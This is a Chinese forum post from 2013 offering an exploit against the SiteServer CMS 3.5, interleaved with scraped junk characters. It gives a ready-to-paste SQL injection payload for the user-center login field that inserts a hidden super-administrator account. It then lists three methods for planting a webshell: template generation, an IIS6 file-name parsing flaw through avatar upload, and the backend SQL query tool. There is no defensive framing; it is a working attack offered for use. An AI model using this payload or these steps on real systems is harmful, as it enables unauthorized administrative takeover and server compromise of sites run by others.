经测试秒杀最新的3.5版
Y% `' G V# b: W2 L# I7 Dstieserver官网:www.siteserver.cn
1 Z) q( C: N, M% A3 Z( K8 WEXP:
1 H& Q4 L1 f( f2 o5 ^6 |直接访问UserCenter/login.aspx0 G# n5 c: a/ G. l% ]8 w; X ~: D. E5 [
用户名处输入:
# l: b$ S' @2 z. X/ y$ J# G9 m4 o
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
0 H( ~* f5 f3 \密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
/ C% m/ n# c: j6 g6 v: ^之后再访问后台SiteServer/login.aspx用插入的用户登陆1 q% A! Y, g* L+ u% _
后台拿webshell的三种方法:
, ]+ O& Z& E3 q一、+ w7 s* E3 X6 @: a* D% q* ?' C: Q
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
% x' L+ J3 Y) O" D二、+ t' u- z- P( m
成员权限-》添加用户-》用户名为:1.asp
! {' w- @3 X+ m5 m V- Ahttp://127.0.0.1/usercenter/" O$ {8 P7 n7 R7 U! f. A* i: [, |$ q; l
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
, r( N7 z S8 }8 O; R(ps:后台添加用户时不会验证是否含有非法字符)" m: |# n& x" _6 E7 c
三、
# V2 o; j$ P) d( M4 r* U8 Q2 q8 I5 i" F系统工具-》实用工具-》机器参数查看4 f0 k6 g7 k- u* {7 w9 t+ H
可以看到数据库类型、名称,WEB路径$ H E5 B. X: X& Z R& y6 m. t
系统工具-》数据库工具-》SQL语句查询
7 L6 h8 l2 a) o6 B3 i这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对